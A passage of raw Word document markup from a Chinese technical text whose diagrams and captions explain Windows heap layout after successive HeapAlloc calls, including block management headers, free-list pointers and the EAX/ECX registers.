                <v:shape id="文本框 81" o:spid="_x0000_s1079" type="#_x0000_t202" style="position:absolute;left:12831;top:10986;width:17138;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nSxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6q5tYKGvqKkUQcqiHRqXXR/aZBLNv092txn/vCoLHYWa+YebL0fbiRD50jjXkkwwE&#10;ce1Mx42G3Xb9pkCEiGywd0waLhRguXh+mmNh3Jl/6FTFRiQIhwI1tDEOhZShbslimLiBOHkH5y3G&#10;JH0jjcdzgtteTrPsQ1rsOC20ONCqpfpY/VsNm9WsUuX04n9n7+W6Un+5+1Z7rV9fxq9PEJHG+Ajf&#10;26XRoHK4fUk/QC6uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFVcudLEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="58F953D8" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>系统返回的Buf</w:t>
                        </w:r>
                        <w:r>
                          <w:t>1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>可用空间</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="连接符: 肘形 82" o:spid="_x0000_s1080" type="#_x0000_t33" style="position:absolute;left:10745;top:6350;width:2085;height:65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vjAxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;EIXvhf6HMIXeataFiqxGkUXFnqxaischmW6WbibrJq7bf98UCh4fb9735s2Xg2tET12oPSsYjzIQ&#10;xNqbmisFH6fNyxREiMgGG8+k4IcCLBePD3MsjL/xgfpjrESCcChQgY2xLaQM2pLDMPItcfK+fOcw&#10;JtlV0nR4S3DXyDzLJtJhzanBYkulJf19vLr0xvrg/LY/6wHLz8ve6nf3+lYp9fw0rGYgIg3xfvyf&#10;3hkF0xz+tiQAyMUvAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANHW+MDEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:shape id="连接符: 肘形 83" o:spid="_x0000_s1081" type="#_x0000_t33" style="position:absolute;left:39605;top:6350;width:2765;height:537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bxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;EIXvBf9DGKG3mtVika1RiqjUU+sq4nFIppulm8m6Sdftv28KgsfHm/e9efNl72rRURsqzwrGowwE&#10;sfam4lLB8bB5moEIEdlg7ZkU/FKA5WLwMMfc+CvvqStiKRKEQ44KbIxNLmXQlhyGkW+Ik/flW4cx&#10;ybaUpsVrgrtaTrLsRTqsODVYbGhlSX8XPy69sd47v+3OusfV6fJh9aeb7kqlHof92yuISH28H9/S&#10;70bB7Bn+tyQAyMUfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAL6aXVvEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1082" type="#_x0000_t202" style="position:absolute;left:42372;top:9597;width:4635;height:42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14:paraId="0EC1EA23" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>EAX</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="连接符: 肘形 85" o:spid="_x0000_s1083" type="#_x0000_t33" style="position:absolute;left:47482;top:6351;width:2928;height:67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2C0wwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;EIXvBf9DGMFbzVqwyGoUESt6qtpSPA7JdLN0M1k3cV3/vRGEHh9v3vfmzRadq0RLTSg9KxgNMxDE&#10;2puSCwXfXx+vExAhIhusPJOCGwVYzHsvM8yNv/KB2mMsRIJwyFGBjbHOpQzaksMw9DVx8n594zAm&#10;2RTSNHhNcFfJtyx7lw5LTg0Wa1pZ0n/Hi0tvrA/Ob9qT7nD1c/60eu/Gu0KpQb9bTkFE6uL/8TO9&#10;NQomY3hsSQCQ8zsAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAXj9gtMMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block"/>
                </v:shape>
                <v:rect id="矩形 86" o:spid="_x0000_s1084" style="position:absolute;left:39607;top:2928;width:1575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textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="72BB341F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>两个双链表的指针</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="文本框 96" o:spid="_x0000_s1085" type="#_x0000_t202" style="position:absolute;left:50413;top:10988;width:4565;height:42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14:paraId="2503B060" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                          </w:rPr>
                          <w:t>ECX</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="72872870"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hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">.17 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>第一次申请堆的内存结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4627353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系统实际多申请8字节管理空间</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，由</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>两个指针将空闲块连接起来</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69325C5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第二次</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>申请堆空间，执行b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>uf2=HeapAlloc(hHeap,0,16);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统返回buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的可用空间，此时的堆结构如图</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2.18</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E81FA" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="-295" w:left="-619" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpc">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F6072EB" wp14:editId="42257943">
                <wp:extent cx="5967730" cy="1459252"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:docPr id="235"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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4781858" y="36238"/>
                            <a:ext cx="556260" cy="305435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="16C4A5EC"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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3389735" y="62125"/>
                            <a:ext cx="556260" cy="305435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4BAB90B9"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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1165300" y="62125"/>
                            <a:ext cx="556260" cy="305435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="018DF5F1"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矩形 91"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="57" y="317712"/>
                            <a:ext cx="110095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0AA7D96B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00747D3A" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r w:rsidRPr="00747D3A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>Buf1</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>用户内存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40258" y="317773"/>
                            <a:ext cx="1567811"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BBDEEFB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00734F55" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r w:rsidRPr="00734F55">
                                <w:t>Buf2</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00734F55">
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>的管理结构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2052168" y="318409"/>
                            <a:ext cx="1019470" cy="342265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5F38B606" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="004C22B0" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r w:rsidRPr="004C22B0">
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>Buf</w:t>
                              </w:r>
                              <w:r w:rsidRPr="004C22B0">
                                <w:t>2</w:t>
                              </w:r>
                              <w:r w:rsidRPr="004C22B0">
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>用户内存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文本框 94"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1283076" y="881799"/>
                            <a:ext cx="1713865" cy="387985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6A3400A7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>系统返回的Buf</w:t>
                              </w:r>
                              <w:r>
                                <w:t>2</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>可用空间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连接符: 肘形 96"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="940238" y="660674"/>
                            <a:ext cx="342810" cy="41517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连接符: 肘形 97"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="4463547" y="660600"/>
                            <a:ext cx="202805" cy="58598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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4666453" y="1033802"/>
                            <a:ext cx="463550" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="60804FAB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>EAX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9" name="连接符: 肘形 99"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="4997258" y="660599"/>
                            <a:ext cx="323857" cy="41817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矩形 100"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2982291" y="318334"/>
                            <a:ext cx="1563583" cy="342265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2248FBF7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00A47BED" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>下一空闲堆的管理结构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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5321230" y="866035"/>
                            <a:ext cx="456565" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="74035635" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>ECX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2" name="矩形 102"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4463643" y="319044"/>
                            <a:ext cx="1321335" cy="341630"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="45DE5EC4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                  <w:szCs w:val="21"/>
                                </w:rPr>
                                <w:t>两个双链表的指针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F6072EB" id="画布 235" o:spid="_x0000_s1086" editas="canvas" style="width:469.9pt;height:114.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59677,1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&#10;">
                <v:shape id="_x0000_s1087" type="#_x0000_t75" style="position:absolute;width:59677;height:14592;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
